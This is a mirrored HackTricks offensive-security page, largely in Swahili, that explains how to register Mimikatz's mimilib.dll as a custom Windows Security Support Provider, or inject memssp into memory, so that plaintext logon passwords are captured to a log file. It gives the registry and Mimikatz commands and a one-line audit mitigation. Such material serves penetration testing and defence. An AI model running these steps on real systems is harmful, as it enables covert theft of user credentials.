Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-18 06:58:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

3.7 KiB
Raw Blame History

Custom SSP

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Custom SSP

Learn what is a SSP (Security Support Provider) here.
Unaweza kuunda SSP yako mwenyewe ili kukamata katika maandishi wazi nywila zinazotumika kufikia mashine.

Mimilib

Unaweza kutumia mimilib.dll binary inayotolewa na Mimikatz. Hii itarekodi ndani ya faili nywila zote katika maandiko wazi.
Tupa dll katika C:\Windows\System32\
Pata orodha ya Vifurushi vya Usalama vya LSA vilivyopo:

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Ongeza mimilib.dll kwenye orodha ya Watoa Msaada wa Usalama (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Na baada ya kuanzisha upya, akreditivu zote zinaweza kupatikana kwa maandiko wazi katika C:\Windows\System32\kiwissp.log

Katika kumbukumbu

Unaweza pia kuingiza hii moja kwa moja katika kumbukumbu ukitumia Mimikatz (zingatia kwamba inaweza kuwa na utata kidogo/isiweze kufanya kazi):

privilege::debug
misc::memssp

This won't survive reboots.

Mitigation

Event ID 4657 - Audit creation/change of HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

{% hint style="success" %} Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}